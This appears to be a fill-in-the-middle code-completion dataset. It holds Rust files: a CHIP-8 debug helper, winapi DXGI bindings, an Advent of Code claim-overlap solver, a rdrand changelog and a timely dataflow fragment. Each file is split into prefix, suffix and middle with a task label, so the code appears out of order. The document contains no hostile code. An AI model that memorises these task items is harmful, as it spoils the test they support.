if cpu.v[i] == 0 {
continue;
}
println!(" v{:.x}: {:.x}", i, cpu.v[i]);
}
println!(" pc: {:.x}", cpu.pc);
println!(" I: {:.x}", cpu.i);
println!(" sp: {:.x}", cpu.sp);
println!("opcode: {:.x}", opcode.code);
}
|
debug_cycle
|
identifier_name
|
util.rs
|
use cpu::Cpu;
use opcode::Opcode;
pub static mut DEBUG_MODE: bool = true;
pub static FONTSET: [u8; 80] = [
0xF0, 0x90, 0x90, 0x90, 0xF0, // 0
0x20, 0x60, 0x20, 0x20, 0x70, // 1
0xF0, 0x10, 0xF0, 0x80, 0xF0, // 2
0xF0, 0x10, 0xF0, 0x10, 0xF0, // 3
0x90, 0x90, 0xF0, 0x10, 0x10, // 4
0xF0, 0x80, 0xF0, 0x10, 0xF0, // 5
0xF0, 0x80, 0xF0, 0x90, 0xF0, // 6
0xF0, 0x10, 0x20, 0x40, 0x40, // 7
0xF0, 0x90, 0xF0, 0x90, 0xF0, // 8
0xF0, 0x90, 0xF0, 0x10, 0xF0, // 9
0xF0, 0x90, 0xF0, 0x90, 0x90, // A
0xE0, 0x90, 0xE0, 0x90, 0xE0, // B
0xF0, 0x80, 0x80, 0x80, 0xF0, // C
0xE0, 0x90, 0x90, 0x90, 0xE0, // D
0xF0, 0x80, 0xF0, 0x80, 0xF0, // E
0xF0, 0x80, 0xF0, 0x80, 0x80 // F
];
pub fn debug_cycle(cpu: &Cpu, opcode: &Opcode) {
unsafe {
if!DEBUG_MODE {
return;
}
}
println!("cpu:");
for i in 0..16 {
if cpu.v[i] == 0
|
println!(" v{:.x}: {:.x}", i, cpu.v[i]);
}
println!(" pc: {:.x}", cpu.pc);
println!(" I: {:.x}", cpu.i);
println!(" sp: {:.x}", cpu.sp);
println!("opcode: {:.x}", opcode.code);
}
|
{
continue;
}
|
conditional_block
|
util.rs
|
use cpu::Cpu;
use opcode::Opcode;
pub static mut DEBUG_MODE: bool = true;
pub static FONTSET: [u8; 80] = [
0xF0, 0x90, 0x90, 0x90, 0xF0, // 0
0x20, 0x60, 0x20, 0x20, 0x70, // 1
0xF0, 0x10, 0xF0, 0x80, 0xF0, // 2
0xF0, 0x10, 0xF0, 0x10, 0xF0, // 3
0x90, 0x90, 0xF0, 0x10, 0x10, // 4
0xF0, 0x80, 0xF0, 0x10, 0xF0, // 5
0xF0, 0x80, 0xF0, 0x90, 0xF0, // 6
0xF0, 0x10, 0x20, 0x40, 0x40, // 7
0xF0, 0x90, 0xF0, 0x90, 0xF0, // 8
0xF0, 0x90, 0xF0, 0x10, 0xF0, // 9
0xF0, 0x90, 0xF0, 0x90, 0x90, // A
0xE0, 0x90, 0xE0, 0x90, 0xE0, // B
0xF0, 0x80, 0x80, 0x80, 0xF0, // C
0xE0, 0x90, 0x90, 0x90, 0xE0, // D
0xF0, 0x80, 0xF0, 0x80, 0xF0, // E
0xF0, 0x80, 0xF0, 0x80, 0x80 // F
];
pub fn debug_cycle(cpu: &Cpu, opcode: &Opcode)
|
{
unsafe {
if !DEBUG_MODE {
return;
}
}
println!("cpu:");
for i in 0..16 {
if cpu.v[i] == 0 {
continue;
}
println!(" v{:.x}: {:.x}", i, cpu.v[i]);
}
println!(" pc: {:.x}", cpu.pc);
println!(" I: {:.x}", cpu.i);
println!(" sp: {:.x}", cpu.sp);
println!("opcode: {:.x}", opcode.code);
}
|
identifier_body
|
|
util.rs
|
use cpu::Cpu;
use opcode::Opcode;
pub static mut DEBUG_MODE: bool = true;
|
pub static FONTSET: [u8; 80] = [
0xF0, 0x90, 0x90, 0x90, 0xF0, // 0
0x20, 0x60, 0x20, 0x20, 0x70, // 1
0xF0, 0x10, 0xF0, 0x80, 0xF0, // 2
0xF0, 0x10, 0xF0, 0x10, 0xF0, // 3
0x90, 0x90, 0xF0, 0x10, 0x10, // 4
0xF0, 0x80, 0xF0, 0x10, 0xF0, // 5
0xF0, 0x80, 0xF0, 0x90, 0xF0, // 6
0xF0, 0x10, 0x20, 0x40, 0x40, // 7
0xF0, 0x90, 0xF0, 0x90, 0xF0, // 8
0xF0, 0x90, 0xF0, 0x10, 0xF0, // 9
0xF0, 0x90, 0xF0, 0x90, 0x90, // A
0xE0, 0x90, 0xE0, 0x90, 0xE0, // B
0xF0, 0x80, 0x80, 0x80, 0xF0, // C
0xE0, 0x90, 0x90, 0x90, 0xE0, // D
0xF0, 0x80, 0xF0, 0x80, 0xF0, // E
0xF0, 0x80, 0xF0, 0x80, 0x80 // F
];
pub fn debug_cycle(cpu: &Cpu, opcode: &Opcode) {
unsafe {
if!DEBUG_MODE {
return;
}
}
println!("cpu:");
for i in 0..16 {
if cpu.v[i] == 0 {
continue;
}
println!(" v{:.x}: {:.x}", i, cpu.v[i]);
}
println!(" pc: {:.x}", cpu.pc);
println!(" I: {:.x}", cpu.i);
println!(" sp: {:.x}", cpu.sp);
println!("opcode: {:.x}", opcode.code);
}
|
random_line_split
|
|
dxgi.rs
|
// Copyright © 2015-2017 winapi-rs developers
// Licensed under the Apache License, Version 2.0
// <LICENSE-APACHE or http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your option.
// All files in the project carrying such notice may not be copied, modified, or distributed
// except according to those terms.
//! Mappings for the contents of dxgi.h
use ctypes::c_void;
use shared::basetsd::{SIZE_T, UINT64};
use shared::dxgiformat::DXGI_FORMAT;
use shared::dxgitype::{
DXGI_GAMMA_CONTROL, DXGI_GAMMA_CONTROL_CAPABILITIES, DXGI_MODE_DESC, DXGI_MODE_ROTATION,
DXGI_SAMPLE_DESC, DXGI_USAGE,
};
use shared::guiddef::{REFGUID, REFIID};
use shared::minwindef::{BOOL, BYTE, DWORD, FLOAT, HMODULE, UINT};
use shared::windef::{HDC, HMONITOR, HWND, RECT};
use um::unknwnbase::{IUnknown, IUnknownVtbl};
use um::winnt::{HANDLE, HRESULT, INT, LARGE_INTEGER, LUID, WCHAR};
STRUCT!{struct DXGI_FRAME_STATISTICS {
PresentCount: UINT,
PresentRefreshCount: UINT,
SyncRefreshCount: UINT,
SyncQPCTime: LARGE_INTEGER,
SyncGPUTime: LARGE_INTEGER,
}}
STRUCT!{struct DXGI_MAPPED_RECT {
Pitch: INT,
pBits: *mut BYTE,
}}
STRUCT!{struct DXGI_ADAPTER_DESC {
Description: [WCHAR; 128],
VectorId: UINT,
DeviceId: UINT,
SubSysId: UINT,
Revision: UINT,
DedicatedVideoMemory: SIZE_T,
DedicatedSystemMemory: SIZE_T,
SharedSystemMemory: SIZE_T,
AdapterLuid: LUID,
}}
STRUCT!{struct DXGI_OUTPUT_DESC {
DeviceName: [WCHAR; 32],
DesktopCoordinates: RECT,
AttachedToDesktop: BOOL,
Rotation: DXGI_MODE_ROTATION,
Monitor: HMONITOR,
}}
STRUCT!{struct DXGI_SHARED_RESOURCE {
Handle: HANDLE,
}}
pub const DXGI_RESOURCE_PRIORITY_MINIMUM: DWORD = 0x28000000;
pub const DXGI_RESOURCE_PRIORITY_LOW: DWORD = 0x50000000;
pub const DXGI_RESOURCE_PRIORITY_NORMAL: DWORD = 0x78000000;
pub const DXGI_RESOURCE_PRIORITY_HIGH: DWORD = 0xa0000000;
pub const DXGI_RESOURCE_PRIORITY_MAXIMUM: DWORD = 0xc8000000;
ENUM!{enum DXGI_RESIDENCY {
DXGI_RESIDENCY_FULLY_RESIDENT = 1,
DXGI_RESIDENCY_RESIDENT_IN_SHARED_MEMORY = 2,
DXGI_RESIDENCY_EVICTED_TO_DISK = 3,
}}
STRUCT!{struct DXGI_SURFACE_DESC {
Width: UINT,
Height: UINT,
Format: DXGI_FORMAT,
SampleDesc: DXGI_SAMPLE_DESC,
}}
ENUM!{enum DXGI_SWAP_EFFECT {
DXGI_SWAP_EFFECT_DISCARD = 0,
DXGI_SWAP_EFFECT_SEQUENTIAL = 1,
DXGI_SWAP_EFFECT_FLIP_SEQUENTIAL = 3,
DXGI_SWAP_EFFECT_FLIP_DISCARD = 4,
}}
ENUM!{enum DXGI_SWAP_CHAIN_FLAG {
DXGI_SWAP_CHAIN_FLAG_NONPREROTATED = 1,
DXGI_SWAP_CHAIN_FLAG_ALLOW_MODE_SWITCH = 2,
DXGI_SWAP_CHAIN_FLAG_GDI_COMPATIBLE = 4,
DXGI_SWAP_CHAIN_FLAG_RESTRICTED_CONTENT = 8,
DXGI_SWAP_CHAIN_FLAG_RESTRICT_SHARED_RESOURCE_DRIVER = 16,
DXGI_SWAP_CHAIN_FLAG_DISPLAY_ONLY = 32,
DXGI_SWAP_CHAIN_FLAG_FRAME_LATENCY_WAITABLE_OBJECT = 64,
DXGI_SWAP_CHAIN_FLAG_FOREGROUND_LAYER = 128,
DXGI_SWAP_CHAIN_FLAG_FULLSCREEN_VIDEO = 256,
DXGI_SWAP_CHAIN_FLAG_YUV_VIDEO = 512,
}}
STRUCT!{struct DXGI_SWAP_CHAIN_DESC {
BufferDesc: DXGI_MODE_DESC,
SampleDesc: DXGI_SAMPLE_DESC,
BufferUsage: DXGI_USAGE,
BufferCount: UINT,
OutputWindow: HWND,
Windowed: BOOL,
SwapEffect: DXGI_SWAP_EFFECT,
Flags: UINT,
}}
RIDL!(#[uuid(0xaec22fb8, 0x76f3, 0x4639, 0x9b, 0xe0, 0x28, 0xeb, 0x43, 0xa6, 0x7a, 0x2e)]
interface IDXGIObject(IDXGIObjectVtbl): IUnknown(IUnknownVtbl) {
fn SetPrivateData(
Name: REFGUID,
DataSize: UINT,
pData: *const c_void,
) -> HRESULT,
fn SetPrivateDataInterface(
Name: REFGUID,
pUnknown: *const IUnknown,
) -> HRESULT,
fn GetPrivateData(
Name: REFGUID,
pDataSize: *mut UINT,
pData: *mut c_void,
) -> HRESULT,
fn GetParent(
riid: REFIID,
ppParent: *mut *mut c_void,
) -> HRESULT,
});
RIDL!(#[uuid(0x3d3e0379, 0xf9de, 0x4d58, 0xbb, 0x6c, 0x18, 0xd6, 0x29, 0x92, 0xf1, 0xa6)]
interface IDXGIDeviceSubObject(IDXGIDeviceSubObjectVtbl): IDXGIObject(IDXGIObjectVtbl) {
fn GetDevice(
riid: REFIID,
ppDevice: *mut *mut c_void,
) -> HRESULT,
});
RIDL!(#[uuid(0x035f3ab4, 0x482e, 0x4e50, 0xb4, 0x1f, 0x8a, 0x7f, 0x8b, 0xd8, 0x96, 0x0b)]
interface IDXGIResource(IDXGIResourceVtbl): IDXGIDeviceSubObject(IDXGIDeviceSubObjectVtbl) {
fn GetSharedHandle(
pSharedHandle: *mut HANDLE,
) -> HRESULT,
fn GetUsage(
pUsage: *mut DXGI_USAGE,
) -> HRESULT,
fn SetEvictionPriority(
EvictionPriority: UINT,
) -> HRESULT,
fn GetEvictionPriority(
pEvictionPriority: *mut UINT,
) -> HRESULT,
});
RIDL!(#[uuid(0x9d8e1289, 0xd7b3, 0x465f, 0x81, 0x26, 0x25, 0x0e, 0x34, 0x9a, 0xf8, 0x5d)]
interface IDXGIKeyedMutex(IDXGIKeyedMutexVtbl): IDXGIDeviceSubObject(IDXGIDeviceSubObjectVtbl) {
fn AcquireSync(
Key: UINT64,
dwMilliseconds: DWORD,
) -> HRESULT,
fn ReleaseSync(
Key: UINT64,
) -> HRESULT,
});
RIDL!(#[uuid(0xcafcb56c, 0x6ac3, 0x4889, 0xbf, 0x47, 0x9e, 0x23, 0xbb, 0xd2, 0x60, 0xec)]
interface IDXGISurface(IDXGISurfaceVtbl): IDXGIDeviceSubObject(IDXGIDeviceSubObjectVtbl) {
fn GetDesc(
pDesc: *mut DXGI_SURFACE_DESC,
) -> HRESULT,
fn Map(
pLockedRect: *mut DXGI_MAPPED_RECT,
MapFlags: UINT,
) -> HRESULT,
fn Unmap() -> HRESULT,
});
RIDL!(#[uuid(0x4ae63092, 0x6327, 0x4c1b, 0x80, 0xae, 0xbf, 0xe1, 0x2e, 0xa3, 0x2b, 0x86)]
interface IDXGISurface1(IDXGISurface1Vtbl): IDXGISurface(IDXGISurfaceVtbl) {
fn GetDC(
Discard: BOOL,
phdc: *mut HDC,
) -> HRESULT,
fn ReleaseDC(
pDirtyRect: *mut RECT,
) -> HRESULT,
});
RIDL!(#[uuid(0x2411e7e1, 0x12ac, 0x4ccf, 0xbd, 0x14, 0x97, 0x98, 0xe8, 0x53, 0x4d, 0xc0)]
interface IDXGIAdapter(IDXGIAdapterVtbl): IDXGIObject(IDXGIObjectVtbl) {
fn EnumOutputs(
Output: UINT,
ppOutput: *mut *mut IDXGIOutput,
) -> HRESULT,
fn GetDesc(
pDesc: *mut DXGI_ADAPTER_DESC,
) -> HRESULT,
fn CheckInterfaceSupport(
InterfaceName: REFGUID,
pUMDVersion: *mut LARGE_INTEGER,
) -> HRESULT,
});
RIDL!(#[uuid(0xae02eedb, 0xc735, 0x4690, 0x8d, 0x52, 0x5a, 0x8d, 0xc2, 0x02, 0x13, 0xaa)]
interface IDXGIOutput(IDXGIOutputVtbl): IDXGIObject(IDXGIObjectVtbl) {
fn GetDesc(
pDesc: *mut DXGI_OUTPUT_DESC,
) -> HRESULT,
fn GetDisplayModeList(
EnumFormat: DXGI_FORMAT,
Flags: UINT,
pNumModes: *mut UINT,
pDesc: *mut DXGI_MODE_DESC,
) -> HRESULT,
fn FindClosestMatchingMode(
pModeToMatch: *const DXGI_MODE_DESC,
pClosestMatch: *mut DXGI_MODE_DESC,
pConcernedDevice: *mut IUnknown,
) -> HRESULT,
fn WaitForVBlank() -> HRESULT,
fn TakeOwnership(
pDevice: *mut IUnknown,
Exclusive: BOOL,
) -> HRESULT,
fn ReleaseOwnership() -> (),
fn GetGammaControlCapabilities(
pGammaCaps: *mut DXGI_GAMMA_CONTROL_CAPABILITIES,
) -> HRESULT,
fn SetGammaControl(
pArray: *const DXGI_GAMMA_CONTROL,
) -> HRESULT,
fn GetGammaControl(
pArray: *mut DXGI_GAMMA_CONTROL,
) -> HRESULT,
fn SetDisplaySurface(
pScanoutSurface: *mut IDXGISurface,
) -> HRESULT,
fn GetDisplaySurfaceData(
pDestination: *mut IDXGISurface,
) -> HRESULT,
fn GetFrameStatistics(
pStats: *mut DXGI_FRAME_STATISTICS,
) -> HRESULT,
});
pub const DXGI_MAX_SWAP_CHAIN_BUFFERS: DWORD = 16;
pub const DXGI_PRESENT_TEST: DWORD = 0x00000001;
pub const DXGI_PRESENT_DO_NOT_SEQUENCE: DWORD = 0x00000002;
pub const DXGI_PRESENT_RESTART: DWORD = 0x00000004;
pub const DXGI_PRESENT_DO_NOT_WAIT: DWORD = 0x00000008;
pub const DXGI_PRESENT_STEREO_PREFER_RIGHT: DWORD = 0x00000010;
pub const DXGI_PRESENT_STEREO_TEMPORARY_MONO: DWORD = 0x00000020;
pub const DXGI_PRESENT_RESTRICT_TO_OUTPUT: DWORD = 0x00000040;
pub const DXGI_PRESENT_USE_DURATION: DWORD = 0x00000100;
RIDL!(#[uuid(0x310d36a0, 0xd2e7, 0x4c0a, 0xaa, 0x04, 0x6a, 0x9d, 0x23, 0xb8, 0x88, 0x6a)]
interface IDXGISwapChain(IDXGISwapChainVtbl): IDXGIDeviceSubObject(IDXGIDeviceSubObjectVtbl) {
fn Present(
SyncInterval: UINT,
Flags: UINT,
) -> HRESULT,
fn GetBuffer(
Buffer: UINT,
riid: REFIID,
ppSurface: *mut *mut c_void,
) -> HRESULT,
fn SetFullscreenState(
Fullscreen: BOOL,
|
ppTarget: *mut *mut IDXGIOutput,
) -> HRESULT,
fn GetDesc(
pDesc: *mut DXGI_SWAP_CHAIN_DESC,
) -> HRESULT,
fn ResizeBuffers(
BufferCount: UINT,
Width: UINT,
Height: UINT,
NewFormat: DXGI_FORMAT,
SwapChainFlags: UINT,
) -> HRESULT,
fn ResizeTarget(
pNewTargetParameters: *const DXGI_MODE_DESC,
) -> HRESULT,
fn GetContainingOutput(
ppOutput: *mut *mut IDXGIOutput,
) -> HRESULT,
fn GetFrameStatistics(
pStats: *mut DXGI_FRAME_STATISTICS,
) -> HRESULT,
fn GetLastPresentCount(
pLastPresentCount: *mut UINT,
) -> HRESULT,
});
RIDL!(#[uuid(0x7b7166ec, 0x21c7, 0x44ae, 0xb2, 0x1a, 0xc9, 0xae, 0x32, 0x1a, 0xe3, 0x69)]
interface IDXGIFactory(IDXGIFactoryVtbl): IDXGIObject(IDXGIObjectVtbl) {
fn EnumAdapters(
Adapter: UINT,
ppAdapter: *mut *mut IDXGIAdapter,
) -> HRESULT,
fn MakeWindowAssociation(
WindowHandle: HWND,
Flags: UINT,
) -> HRESULT,
fn GetWindowAssociation(
pWindowHandle: *mut HWND,
) -> HRESULT,
fn CreateSwapChain(
pDevice: *mut IUnknown,
pDesc: *mut DXGI_SWAP_CHAIN_DESC,
ppSwapChain: *mut *mut IDXGISwapChain,
) -> HRESULT,
fn CreateSoftwareAdapter(
Module: HMODULE,
ppAdapter: *mut *mut IDXGIAdapter,
) -> HRESULT,
});
RIDL!(#[uuid(0x54ec77fa, 0x1377, 0x44e6, 0x8c, 0x32, 0x88, 0xfd, 0x5f, 0x44, 0xc8, 0x4c)]
interface IDXGIDevice(IDXGIDeviceVtbl): IDXGIObject(IDXGIObjectVtbl) {
fn GetAdapter(
pAdapter: *mut *mut IDXGIAdapter,
) -> HRESULT,
fn CreateSurface(
pDesc: *const DXGI_SURFACE_DESC,
NumSurfaces: UINT,
Usage: DXGI_USAGE,
pSharedResource: *const DXGI_SHARED_RESOURCE,
ppSurface: *mut *mut IDXGISurface,
) -> HRESULT,
fn QueryResourceResidency(
ppResources: *const *mut IUnknown,
pResidencyStatus: *mut DXGI_RESIDENCY,
NumResources: UINT,
) -> HRESULT,
fn SetGPUThreadPriority(
Priority: INT,
) -> HRESULT,
fn GetGPUThreadPriority(
pPriority: *mut INT,
) -> HRESULT,
});
ENUM!{enum DXGI_ADAPTER_FLAG {
DXGI_ADAPTER_FLAG_NONE,
DXGI_ADAPTER_FLAG_REMOTE,
DXGI_ADAPTER_FLAG_SOFTWARE,
}}
STRUCT!{struct DXGI_ADAPTER_DESC1 {
Description: [WCHAR; 128],
VendorId: UINT,
DeviceId: UINT,
SubSysId: UINT,
Revision: UINT,
DedicatedVideoMemory: SIZE_T,
DedicatedSystemMemory: SIZE_T,
SharedSystemMemory: SIZE_T,
AdapterLuid: LUID,
Flags: UINT,
}}
STRUCT!{struct DXGI_DISPLAY_COLOR_SPACE {
PrimaryCoordinates: [[FLOAT; 2]; 8],
WhitePoints: [[FLOAT; 2]; 16],
}}
RIDL!(#[uuid(0x770aae78, 0xf26f, 0x4dba, 0xa8, 0x29, 0x25, 0x3c, 0x83, 0xd1, 0xb3, 0x87)]
interface IDXGIFactory1(IDXGIFactory1Vtbl): IDXGIFactory(IDXGIFactoryVtbl) {
fn EnumAdapters1(
Adapter: UINT,
ppAdapter: *mut *mut IDXGIAdapter1,
) -> HRESULT,
fn IsCurrent() -> BOOL,
});
RIDL!(#[uuid(0x29038f61, 0x3839, 0x4626, 0x91, 0xfd, 0x08, 0x68, 0x79, 0x01, 0x1a, 0x05)]
interface IDXGIAdapter1(IDXGIAdapter1Vtbl): IDXGIAdapter(IDXGIAdapterVtbl) {
fn GetDesc1(
pDesc: *mut DXGI_ADAPTER_DESC1,
) -> HRESULT,
});
RIDL!(#[uuid(0x77db970f, 0x6276, 0x48ba, 0xba, 0x28, 0x07, 0x01, 0x43, 0xb4, 0x39, 0x2c)]
interface IDXGIDevice1(IDXGIDevice1Vtbl): IDXGIDevice(IDXGIDeviceVtbl) {
fn SetMaximumFrameLatency(
MaxLatency: UINT,
) -> HRESULT,
fn GetMaximumFrameLatency(
pMaxLatency: *mut UINT,
) -> HRESULT,
});
|
pTarget: *mut IDXGIOutput,
) -> HRESULT,
fn GetFullscreenState(
pFullscreen: *mut BOOL,
|
random_line_split
|
03.rs
|
#[macro_use]
extern crate lazy_static;
extern crate itertools;
extern crate regex;
use itertools::Itertools;
use regex::Regex;
#[derive(Clone)]
struct Claim {
id: i32,
offset_left: i32,
offset_top: i32,
width: i32,
height: i32,
}
impl Claim {
fn parse(raw_claim: &str) -> Claim {
lazy_static! {
static ref CLAIM_REGEX: Regex =
Regex::new(r"^#(\d+) @ (\d+),(\d+): (\d+)x(\d+)$").unwrap();
}
let captures = CLAIM_REGEX.captures(raw_claim).unwrap();
Claim {
id: captures.get(1).unwrap().as_str().parse::<i32>().unwrap(),
offset_left: captures.get(2).unwrap().as_str().parse::<i32>().unwrap(),
offset_top: captures.get(3).unwrap().as_str().parse::<i32>().unwrap(),
width: captures.get(4).unwrap().as_str().parse::<i32>().unwrap(),
height: captures.get(5).unwrap().as_str().parse::<i32>().unwrap(),
}
}
fn coordinates(self) -> Vec<(i32, i32)> {
let mut coords = Vec::new();
for x in 0..self.width {
for y in 0..self.height {
coords.push((x + self.offset_left, y + self.offset_top));
}
}
coords
}
}
fn overlapping_inches(input: String) -> i32 {
let mut claims: Vec<Claim> = Vec::new();
for raw_claim in input.split("\n") {
claims.push(Claim::parse(raw_claim));
}
let coords = claims.into_iter().flat_map(|x| x.coordinates()).sorted();
let mut prev = (-1, -1);
let mut checked = false;
let mut overlaps = 0;
for c in coords {
if prev == c &&!checked {
|
} else if prev!= c {
checked = false;
}
prev = c;
}
overlaps
}
fn main() {
let input = include_str!("input.txt").into();
println!("{}", overlapping_inches(input));
}
#[test]
fn test_03() {
let input = vec!["#1 @ 1,3: 4x4", "#2 @ 3,1: 4x4", "#3 @ 5,5: 2x2"];
let result = overlapping_inches(input.join("\n"));
assert_eq!(result, 4);
}
|
overlaps += 1;
checked = true;
|
random_line_split
|
03.rs
|
#[macro_use]
extern crate lazy_static;
extern crate itertools;
extern crate regex;
use itertools::Itertools;
use regex::Regex;
#[derive(Clone)]
struct Claim {
id: i32,
offset_left: i32,
offset_top: i32,
width: i32,
height: i32,
}
impl Claim {
fn parse(raw_claim: &str) -> Claim {
lazy_static! {
static ref CLAIM_REGEX: Regex =
Regex::new(r"^#(\d+) @ (\d+),(\d+): (\d+)x(\d+)$").unwrap();
}
let captures = CLAIM_REGEX.captures(raw_claim).unwrap();
Claim {
id: captures.get(1).unwrap().as_str().parse::<i32>().unwrap(),
offset_left: captures.get(2).unwrap().as_str().parse::<i32>().unwrap(),
offset_top: captures.get(3).unwrap().as_str().parse::<i32>().unwrap(),
width: captures.get(4).unwrap().as_str().parse::<i32>().unwrap(),
height: captures.get(5).unwrap().as_str().parse::<i32>().unwrap(),
}
}
fn coordinates(self) -> Vec<(i32, i32)> {
let mut coords = Vec::new();
for x in 0..self.width {
for y in 0..self.height {
coords.push((x + self.offset_left, y + self.offset_top));
}
}
coords
}
}
fn overlapping_inches(input: String) -> i32 {
let mut claims: Vec<Claim> = Vec::new();
for raw_claim in input.split("\n") {
claims.push(Claim::parse(raw_claim));
}
let coords = claims.into_iter().flat_map(|x| x.coordinates()).sorted();
let mut prev = (-1, -1);
let mut checked = false;
let mut overlaps = 0;
for c in coords {
if prev == c &&!checked {
overlaps += 1;
checked = true;
} else if prev!= c {
checked = false;
}
prev = c;
}
overlaps
}
fn main() {
let input = include_str!("input.txt").into();
println!("{}", overlapping_inches(input));
}
#[test]
fn test_03()
|
{
let input = vec!["#1 @ 1,3: 4x4", "#2 @ 3,1: 4x4", "#3 @ 5,5: 2x2"];
let result = overlapping_inches(input.join("\n"));
assert_eq!(result, 4);
}
|
identifier_body
|
|
03.rs
|
#[macro_use]
extern crate lazy_static;
extern crate itertools;
extern crate regex;
use itertools::Itertools;
use regex::Regex;
#[derive(Clone)]
struct Claim {
id: i32,
offset_left: i32,
offset_top: i32,
width: i32,
height: i32,
}
impl Claim {
fn parse(raw_claim: &str) -> Claim {
lazy_static! {
static ref CLAIM_REGEX: Regex =
Regex::new(r"^#(\d+) @ (\d+),(\d+): (\d+)x(\d+)$").unwrap();
}
let captures = CLAIM_REGEX.captures(raw_claim).unwrap();
Claim {
id: captures.get(1).unwrap().as_str().parse::<i32>().unwrap(),
offset_left: captures.get(2).unwrap().as_str().parse::<i32>().unwrap(),
offset_top: captures.get(3).unwrap().as_str().parse::<i32>().unwrap(),
width: captures.get(4).unwrap().as_str().parse::<i32>().unwrap(),
height: captures.get(5).unwrap().as_str().parse::<i32>().unwrap(),
}
}
fn coordinates(self) -> Vec<(i32, i32)> {
let mut coords = Vec::new();
for x in 0..self.width {
for y in 0..self.height {
coords.push((x + self.offset_left, y + self.offset_top));
}
}
coords
}
}
fn overlapping_inches(input: String) -> i32 {
let mut claims: Vec<Claim> = Vec::new();
for raw_claim in input.split("\n") {
claims.push(Claim::parse(raw_claim));
}
let coords = claims.into_iter().flat_map(|x| x.coordinates()).sorted();
let mut prev = (-1, -1);
let mut checked = false;
let mut overlaps = 0;
for c in coords {
if prev == c &&!checked
|
else if prev!= c {
checked = false;
}
prev = c;
}
overlaps
}
fn main() {
let input = include_str!("input.txt").into();
println!("{}", overlapping_inches(input));
}
#[test]
fn test_03() {
let input = vec!["#1 @ 1,3: 4x4", "#2 @ 3,1: 4x4", "#3 @ 5,5: 2x2"];
let result = overlapping_inches(input.join("\n"));
assert_eq!(result, 4);
}
|
{
overlaps += 1;
checked = true;
}
|
conditional_block
|
03.rs
|
#[macro_use]
extern crate lazy_static;
extern crate itertools;
extern crate regex;
use itertools::Itertools;
use regex::Regex;
#[derive(Clone)]
struct
|
{
id: i32,
offset_left: i32,
offset_top: i32,
width: i32,
height: i32,
}
impl Claim {
fn parse(raw_claim: &str) -> Claim {
lazy_static! {
static ref CLAIM_REGEX: Regex =
Regex::new(r"^#(\d+) @ (\d+),(\d+): (\d+)x(\d+)$").unwrap();
}
let captures = CLAIM_REGEX.captures(raw_claim).unwrap();
Claim {
id: captures.get(1).unwrap().as_str().parse::<i32>().unwrap(),
offset_left: captures.get(2).unwrap().as_str().parse::<i32>().unwrap(),
offset_top: captures.get(3).unwrap().as_str().parse::<i32>().unwrap(),
width: captures.get(4).unwrap().as_str().parse::<i32>().unwrap(),
height: captures.get(5).unwrap().as_str().parse::<i32>().unwrap(),
}
}
fn coordinates(self) -> Vec<(i32, i32)> {
let mut coords = Vec::new();
for x in 0..self.width {
for y in 0..self.height {
coords.push((x + self.offset_left, y + self.offset_top));
}
}
coords
}
}
fn overlapping_inches(input: String) -> i32 {
let mut claims: Vec<Claim> = Vec::new();
for raw_claim in input.split("\n") {
claims.push(Claim::parse(raw_claim));
}
let coords = claims.into_iter().flat_map(|x| x.coordinates()).sorted();
let mut prev = (-1, -1);
let mut checked = false;
let mut overlaps = 0;
for c in coords {
if prev == c &&!checked {
overlaps += 1;
checked = true;
} else if prev!= c {
checked = false;
}
prev = c;
}
overlaps
}
fn main() {
let input = include_str!("input.txt").into();
println!("{}", overlapping_inches(input));
}
#[test]
fn test_03() {
let input = vec!["#1 @ 1,3: 4x4", "#2 @ 3,1: 4x4", "#3 @ 5,5: 2x2"];
let result = overlapping_inches(input.join("\n"));
assert_eq!(result, 4);
}
|
Claim
|
identifier_name
|
changelog.rs
|
//! Project changelog
/// ## Breaking changes
///
/// Upgrade to `rand_core = ^0.5.1`. This involves a major change to how errors are handled. See
/// [`ErrorCode`](crate::ErrorCode).
///
/// rustc version 1.42 is now required to build the library (up from 1.32).
pub mod r0_7_0 {}
/// Fix unsound mutable reference aliasing in the implementation of `try_fill_bytes`.
///
/// The affected code has been replaced with safer one where the scope of `unsafe` is reduced to
/// the loop which obtains a random word via a native instruction.
///
/// ## Breaking changes
///
/// rustc version 1.32 is now required to build the library (up from 1.30).
pub mod r0_6_0 {}
|
/// Updated rand_core dependency from `0.3` to `0.4`.
pub mod r0_5_0 {}
/// ## Breaking changes
///
/// Crate gained an enabled-by-default `std` feature. If you relied on rdrand being `core`-able
/// change your dependency to appear as such:
///
/// ```toml
/// rdrand = { version = "0.4", default-features = false }
/// ```
///
/// This is done so that an advantage of the common feature detection functionality could be
/// employed by users that are not constrained by `core`. This functionality is faster, caches the
/// results and is shared between all users of the functionality.
///
/// For `core` usage the feature detection has also been improved and will not be done if e.g.
/// crate is built with `rdrand` instructions enabled globally.
pub mod r0_4_0 {}
/// Crate now works on stable!
///
/// ## Breaking changes
///
/// * Updated to `rand_core = ^0.3`.
pub mod r0_3_0 {}
|
/// Replaced likely unsound use of `core::mem::uninitialized()`.
pub mod r0_5_1 {}
/// ## Breaking changes
///
|
random_line_split
|
scope_wrapper.rs
|
use std::default::Default;
use communication::Communicator;
use progress::frontier::{MutableAntichain, Antichain};
use progress::{Timestamp, Scope};
use progress::nested::Target;
use progress::nested::subgraph::Target::{GraphOutput, ScopeInput};
use progress::count_map::CountMap;
pub struct ScopeWrapper<T: Timestamp> {
pub name: String,
pub scope: Option<Box<Scope<T>>>, // the scope itself
index: u64,
pub inputs: u64, // cached information about inputs
pub outputs: u64, // cached information about outputs
pub edges: Vec<Vec<Target>>,
pub notify: bool,
pub summary: Vec<Vec<Antichain<T::Summary>>>, // internal path summaries (input x output)
pub guarantees: Vec<MutableAntichain<T>>, // per-input: guarantee made by parent scope in inputs
pub capabilities: Vec<MutableAntichain<T>>, // per-output: capabilities retained by scope on outputs
pub outstanding_messages: Vec<MutableAntichain<T>>, // per-input: counts of messages on each input
internal_progress: Vec<CountMap<T>>, // per-output: temp buffer used to ask about internal progress
consumed_messages: Vec<CountMap<T>>, // per-input: temp buffer used to ask about consumed messages
produced_messages: Vec<CountMap<T>>, // per-output: temp buffer used to ask about produced messages
pub guarantee_changes: Vec<CountMap<T>>, // per-input: temp storage for changes in some guarantee...
}
impl<T: Timestamp> ScopeWrapper<T> {
pub fn new(mut scope: Box<Scope<T>>, index: u64, _path: String) -> ScopeWrapper<T> {
let inputs = scope.inputs();
let outputs = scope.outputs();
let notify = scope.notify_me();
let (summary, work) = scope.get_internal_summary();
